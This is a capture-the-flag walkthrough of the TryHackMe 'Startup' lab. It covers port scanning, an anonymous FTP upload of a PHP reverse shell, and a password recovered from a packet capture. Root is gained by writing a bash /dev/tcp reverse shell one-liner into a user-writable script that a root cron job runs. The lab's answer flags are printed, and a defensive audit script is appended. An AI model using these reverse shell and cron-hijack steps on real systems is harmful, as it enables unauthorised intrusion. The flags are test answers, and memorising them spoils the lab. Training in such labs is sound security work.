Hello guys, today I’m gonna solve with you a lab from TryHackMe called Startup. This is an easy CTF, so if you are a beginner or mid-level pentester, it is perfect for practicing your skills.
You need to know the basics of web exploitation.
1 — Starting the lab
First of all, you need to create an account on TryHackMe and start your machine.
As you can see, to complete the lab we need to answer all these questions and get root privileges on the machine.
You need to connect to TryHackMe with OpenVPN or the AttackBox. In this lab I’m gonna use OpenVPN.
2 — Recon
Once I had the machine IP, I ran a simple SYN scan with nmap to find all the open ports.
sudo nmap -sS {machine_ip}
Port 80 is open, which means there is a web application.
There’s nothing interesting on the website, so I ran feroxbuster to enumerate the application’s paths. Gobuster works as well.
feroxbuster -u http://{machine_ip}/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
There’s a path named /files.
3 — Exploitation
Exploring the path, I found this note. It could be interesting.
Now we know that some people can upload files to the website. But how? We have an open FTP port, so let’s start from there.
We can log in as the anonymous user with a blank password!
I’ll try to upload a PHP reverse shell and see what happens (you need to set your IP address and a port in the revshell).
I cannot upload files to the root folder, so I’ll move to the ftp folder.
cd ftp
put revshell.php
It works. Now set up a listener on the port you chose:
nc -lvnp 1337
Go to /files and click on the file you just uploaded.
We did it.
With the ls command I found recipe.txt, so the answer to the first question must be in that file.
The first ingredient is:
Answer 1 — Love
What is the content of user.txt?
I cannot access lennie’s account, so I’ll try to figure out his password.
Searching around the folders, we find an incident folder. Maybe there’s a log with a leaked password?
No, just a Wireshark capture file. Maybe this is the way.
We can copy or move this file to the ftp folder and download it.
mv suspicious.pcapng /var/www/html/files/ftp
It worked! So we just have to download it.
get suspicious.pcapng
Open the file with Wireshark and look for anything unusual.
The first strange thing is packet 34.
Someone tried to upload a shell.php; we can deduce it is someone else, because our file is named revshell.php.
We can confirm this by analysing other packets.
In packet 152 someone tries to access lennie’s account but gets permission denied.
Searching a little more, we can find some sudo -l and su www-data commands, but in packet 177 we find this:
It looks like lennie’s password.
4 — Privilege Escalation
From the nmap scan we know the SSH port is open, so let’s try to connect with it.
ssh lennie@{machine_ip}
It works!
With lennie’s user, we can get our first flag.
Answer 2 — THM{03ce3d619b80ccbfb3b7fc81e46c0e79}
Now we’re gonna have to access the root user. But how?
We could upload linpeas.sh to list all the scripts that run as root, but this is a simple machine, so we can find them ourselves.
We have two scripts. /scripts/planner.sh and /etc/print.sh
I used:
cat print.sh
but there’s only an echo command in it.
But if you look at the permissions, planner.sh belongs to root while print.sh belongs to us. Can you see the problem here?
The script owned by root calls a script that is writable by our user. So whenever root runs his script, ours runs with all his permissions. In this case, the only thing we have to do is edit our script and put a reverse shell in it:
bash -i >& /dev/tcp/{YOUR_IP}/{PORT} 0>&1
I’ve used port 1337.
After modifying the script, you’ll need to wait a minute, because planner.sh is a cron job that calls print.sh.
After a minute:
Now we are Root!
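From the defender’s side, the root cause here is a script run by root (the planner.sh cron job) that executes a file a non-root user can modify. The audit function below is an added example for this writeup, not part of the room or of any tool; it assumes a Linux box with GNU stat, and the helper name and sample paths are my own.

```shell
#!/usr/bin/env bash
# Hypothetical audit helper (not from the room): given a script that root runs,
# list every script it references that a lower privileged user could edit.
# Assumes GNU stat (Linux).

# Print each callee of $1 that is owned by a different user than $1 or that is
# group/world writable. Returns 1 if at least one unsafe callee was found.
unsafe_callees() {
    caller="$1"
    caller_owner=$(stat -c '%U' "$caller")
    found=0
    # Collect absolute paths ending in .sh mentioned anywhere in the caller
    for callee in $(grep -oE '/[A-Za-z0-9_./-]+\.sh' "$caller" | sort -u); do
        [ -f "$callee" ] || continue
        owner=$(stat -c '%U' "$callee")
        perms=$(stat -c '%A' "$callee")   # e.g. -rwxrwxrw-
        reason=""
        if [ "$owner" != "$caller_owner" ]; then
            reason="owned by $owner while caller is owned by $caller_owner"
        fi
        # position 6 is the group write bit, position 9 the world write bit
        case "$perms" in
            ?????w????|????????w?)
                reason="${reason:+$reason; }writable by group/others ($perms)" ;;
        esac
        if [ -n "$reason" ]; then
            printf 'UNSAFE %s: %s\n' "$callee" "$reason"
            found=1
        fi
    done
    return $found
}

# Usage: ./audit_callees.sh /scripts/planner.sh
if [ -n "${1:-}" ]; then
    unsafe_callees "$1"
fi
```

Run it against every script referenced from root’s crontab and /etc/cron.*; a clean run prints nothing and exits 0.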
We just need to cat the last flag.
cat root.txt
Answer 3 — THM{f963aaa6a430f210222158ae15c3d76d}
We did it!
I hope you enjoyed the walkthrough and that you learned something along the way. See you at the next one!
Happy Hacking! :)